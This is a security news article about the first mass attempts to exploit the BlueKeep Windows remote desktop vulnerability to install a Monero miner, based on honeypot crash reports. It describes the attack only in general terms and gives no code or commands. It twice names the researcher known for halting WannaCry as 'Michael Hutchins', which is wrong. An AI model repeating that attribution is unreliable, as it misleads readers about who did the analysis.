Researchers recorded the first massive attempts to exploit RCE vulnerability in Windows

Exploit the RCE vulnerability in Windows
Written by Valdis Koks

Cybersecurity experts have revealed the first massive attempts to exploit sensational RCE vulnerability in Windows for mining cryptocurrency on vulnerable systems.

The talk is about the vulnerability CVE-2019-0708 (BlueKeep), a patch for which Microsoft released in May this year.

The problem allows executing arbitrary code and seizing control of the device by sending specially generated requests to the remote desktop services, while user interaction is not required. The bug affects versions of Windows 2003, XP, Windows 7, Windows Server 2008 and 2008 R2 and poses a serious danger, because it can be used to carry out attacks like WannaCry and NotPetya. As of July 2, 2019, the number of systems affected by the BlueKeep vulnerability exceeded 805,000 devices.

The first attempts to exploit this vulnerability were recorded by specialist Kevin Beaumont on Saturday, November 2, when several of his trap systems suddenly crashed and rebooted.

Huh, the EternalPot RDP honeypots have all started BSOD’ing recently. They only expose port 3389”, — wrote Kevin Beaumont in his Twitter.

After analyzing the data shared by Beaumont, information security expert Michael Hutchins, famous for temporarily suspending the WannaCry epidemic in May 2017, confirmed attempts to exploit the bug for Monero cryptocurrency mining.

Kevin Beaumont kindly shared the crash dump with us and following this lead, we discovered the sample was being used in a mass exploitation attempt. Due to only smaller size kernel dumps being enabled, it is difficult to arrive at a definite root cause”, — reported Michael Hutchins.

According to him, the exploit used contains encrypted PowerShell commands to download the final malicious module from a remote server and execute it on the attacked systems. According to the VirusTotal service, the attacks use malware Monero for cryptocurrency mining.

Read also: Microsoft continues to release problematic Windows 10 updates one after other

As the specialist noted, the malware does not have the ability to “spread itself” and cannot move from computer to computer. Apparently, the attackers first scan the Network in search of vulnerable systems and then exploit them. There is currently no data on the number of systems compromised in recent attacks.

It is curious that this publicly known wormable vulnerability, known to everyone who would care to know for at least six months, took this long to get detectably weaponized. One might theorize that attackers know they have essentially one shot at using it at scale, and it becomes a game of chicken as to who will do it first”, — wrote Michael Hutchins.

He also noted that mass exploitation of the vulnerability for the sake of profit could be difficult due to the associated risks and he did not see a surge of random scanning of vulnerable ports, as happened when EternalBlue penetrated the Internet, which is now known as the WannaCry attack.

About the author

Valdis Koks

Security engineer, reverse engineering and memory forensics

Leave a Comment